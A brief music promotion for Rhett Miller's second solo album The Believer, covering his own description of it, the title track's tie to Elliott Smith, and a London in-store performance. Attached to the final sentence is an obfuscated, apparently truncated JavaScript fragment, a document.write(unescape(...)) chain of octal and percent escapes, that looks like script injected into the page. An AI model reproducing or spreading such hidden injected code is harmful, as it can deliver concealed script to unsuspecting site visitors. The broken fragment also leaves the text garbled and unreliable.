Rhett Miller is showcasing his brand new solo album The Believer. "The songs on The Believer are about sex, war, love and death . . . but mostly sex," Rhett Miller says of The Believer, his second solo album, who's quietly powerful title track was inspired by his friend, the late alt-rock troubadour Elliott Smith. Already widely loved for his work as frontman and main songwriter of the the Old 97's (of which he is still a member), Miller reveals a more introspective side here, with a dozen deeply-felt, craftily melodic tunes that demonstrate the Texas-bred artist's knack for using accessible songcraft to address complex emotional issues.
The Believer is Esquire's album of the month. See Rhett Miller perform tracks from it on Wednesday 13th September, 1:30pm at Fopp Tottenham Court Road.document.write(unescape('\04564%6F%63um\145%6Et.%77r%69t\145\04528u%6E\04565s\04563ap\04565\04528\047\045253C%21%5C0\0645\062D%252D\047)\051;
